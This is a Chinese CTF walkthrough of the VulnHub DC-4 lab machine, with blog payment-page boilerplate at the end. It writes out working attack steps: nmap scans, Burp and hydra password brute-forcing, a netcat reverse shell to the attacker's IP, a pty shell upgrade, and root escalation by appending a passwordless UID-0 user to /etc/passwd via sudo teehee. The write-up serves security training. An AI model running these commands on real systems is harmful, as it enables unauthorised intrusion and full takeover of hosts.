渗透测试靶机练习 DC-4

渗透测试靶机练习 DC-4

一、靶机介绍

与之前的靶机是一个系列可在该网站下载搭建
链接:https://www.vulnhub.com/

二、所需工具与思路

Namp:获取IP,端口以及详细信息
burp:爆破破解账号密码
nc反弹shell
hydra爆破密码.
提权

三、渗透测试获取Flag

1.进行主机发现确认主机地址
nmap 192.168.1.0/24
2.对主机进行端口扫描获取详细信息
nmap -p- -A -sV -sS -O 192.168.1.104

在这里插入图片描述开放了80和22端口

3.首先访问80端口

在这里插入图片描述需要账号和密码登录,可以使用burpsuit进行密码爆破
Username:admin
Password:happy
在这里插入图片描述

4.建立连接

通过burpsuit抓包,使用nc进行反弹
首先开启nc的监听端口
在这里插入图片描述然后通过burp抓包进行修改,建立连接

nc 192.168.1.106 1234 -e /bin/bash

在这里插入图片描述在这里插入图片描述建立交互式shell便于操作这里我们使用python建立

python -c 'import pty;pty.spawn("/bin/sh")'
5.查看home目录

在这里插入图片描述
发现有三个用户,注意查看搜集有用信息,最终在jim用户下发现密码备份

在这里插入图片描述
因为开放了ssh连接端口,可以尝试进行远程连接
将密码复制到本地即可使用hydra进行爆破

hydra -l jim -P passwd ssh://192.168.1.104

在这里插入图片描述使用ssh进行远程连接
在这里插入图片描述查看mbox是root用户发来的邮件
在这里插入图片描述
进入/var/mail/查看邮件内容
在这里插入图片描述获得带有密码的邮件
切换用户charles
在这里插入图片描述
查看拥有哪些权限

sudo -l

在这里插入图片描述发现拥有一个root权限可以免密码执行
查看使用方法

teehee --help

在这里插入图片描述可以使用-a: 附加到给定文件,不覆盖

6.提权

尝试在/etc/passwd文件下追加内容

内容结构
用户名:是否有密码保护(x即有保护):uid:gid:全称:home目录:/bin/bash
当uid=0;gid=0时是root权限
echo "hacker::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

在这里插入图片描述
进入root文件获取flag
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值